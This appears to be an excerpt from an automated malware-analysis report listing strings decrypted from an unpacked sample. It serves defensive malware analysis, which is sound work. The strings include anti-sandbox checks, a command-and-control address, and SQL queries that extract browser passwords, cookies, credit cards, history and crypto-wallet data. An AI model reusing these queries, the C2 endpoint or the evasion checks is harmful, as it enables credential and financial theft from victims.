                                    Source: 0000001C.00000002.2272143312.00000000006C1000.00000040.00000001.01000000.00000010.sdmpString decryptor: random
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: INSERT_KEY_HERE
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: 07
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: 01
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: 20
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: 25
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetProcAddress
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: LoadLibraryA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: lstrcatA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: OpenEventA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CreateEventA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CloseHandle
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Sleep
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetUserDefaultLangID
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: VirtualAllocExNuma
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: VirtualFree
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetSystemInfo
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: VirtualAlloc
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: HeapAlloc
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetComputerNameA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: lstrcpyA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetProcessHeap
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetCurrentProcess
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: lstrlenA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: ExitProcess
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GlobalMemoryStatusEx
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetSystemTime
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SystemTimeToFileTime
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: advapi32.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: gdi32.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: user32.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: crypt32.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetUserNameA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CreateDCA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetDeviceCaps
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: ReleaseDC
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CryptStringToBinaryA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sscanf
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: VMwareVMware
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: HAL9TH
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: JohnDoe
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: DISPLAY
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %hu/%hu/%hu
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: http://185.215.113.206
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: /c4becf79229cb002.php
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: /68b591d6548ec281/
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: stok
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetEnvironmentVariableA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetFileAttributesA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: HeapFree
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetFileSize
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GlobalSize
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CreateToolhelp32Snapshot
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: IsWow64Process
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Process32Next
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetLocalTime
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: FreeLibrary
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetTimeZoneInformation
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetSystemPowerStatus
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetVolumeInformationA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetWindowsDirectoryA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Process32First
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetLocaleInfoA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetUserDefaultLocaleName
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetModuleFileNameA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: DeleteFileA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: FindNextFileA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: LocalFree
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: FindClose
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SetEnvironmentVariableA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: LocalAlloc
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetFileSizeEx
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: ReadFile
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SetFilePointer
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: WriteFile
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CreateFileA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: FindFirstFileA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CopyFileA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: VirtualProtect
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetLastError
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: lstrcpynA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: MultiByteToWideChar
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GlobalFree
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: WideCharToMultiByte
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GlobalAlloc
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: OpenProcess
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: TerminateProcess
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetCurrentProcessId
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: gdiplus.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: ole32.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: bcrypt.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: wininet.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: shlwapi.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: shell32.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: rstrtmgr.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CreateCompatibleBitmap
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SelectObject
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: BitBlt
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: DeleteObject
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CreateCompatibleDC
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GdipGetImageEncodersSize
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GdipGetImageEncoders
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GdiplusStartup
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GdiplusShutdown
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GdipSaveImageToStream
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GdipDisposeImage
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GdipFree
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetHGlobalFromStream
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CreateStreamOnHGlobal
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CoUninitialize
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CoInitialize
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CoCreateInstance
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: BCryptGenerateSymmetricKey
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: BCryptCloseAlgorithmProvider
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: BCryptDecrypt
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: BCryptSetProperty
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: BCryptDestroyKey
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: BCryptOpenAlgorithmProvider
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetWindowRect
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetDesktopWindow
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetDC
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CloseWindow
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: wsprintfA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: EnumDisplayDevicesA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetKeyboardLayoutList
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CharToOemW
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: wsprintfW
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RegQueryValueExA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RegEnumKeyExA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RegOpenKeyExA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RegCloseKey
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RegEnumValueA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CryptBinaryToStringA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CryptUnprotectData
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SHGetFolderPathA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: ShellExecuteExA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: InternetOpenUrlA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: InternetConnectA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: InternetCloseHandle
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: HttpSendRequestA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: HttpOpenRequestA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: InternetReadFile
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: InternetCrackUrlA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: StrCmpCA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: StrStrA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: StrCmpCW
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: PathMatchSpecA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: GetModuleFileNameExA
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RmStartSession
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RmRegisterResources
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RmGetList
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: RmEndSession
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3_open
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3_prepare_v2
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3_step
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3_column_text
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3_finalize
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3_close
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3_column_bytes
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: sqlite3_column_blob
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: encrypted_key
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: PATH
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: NSS_Init
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: NSS_Shutdown
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: PK11_GetInternalKeySlot
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: PK11_FreeSlot
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: PK11_Authenticate
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: PK11SDR_Decrypt
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: C:\ProgramData\
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: browser:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: profile:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: url:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: login:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: password:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Opera
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: OperaGX
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Network
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: cookies
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: .txt
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: TRUE
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: FALSE
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: autofill
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: history
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: cc
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: name:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: month:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: year:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: card:
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Cookies
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Login Data
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Web Data
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: History
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: logins.json
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: formSubmitURL
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: usernameField
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: encryptedUsername
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: encryptedPassword
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: guid
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: cookies.sqlite
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: formhistory.sqlite
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: places.sqlite
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: plugins
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Local Extension Settings
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Sync Extension Settings
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: IndexedDB
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Opera Stable
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Opera GX Stable
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: CURRENT
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: chrome-extension_
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: _0.indexeddb.leveldb
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: Local State
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: profiles.ini
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: chrome
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: opera
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: firefox
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: wallets
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %08lX%04lX%lu
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: ProductName
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: x32
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: x64
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: %d/%d/%d %d:%d:%d
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
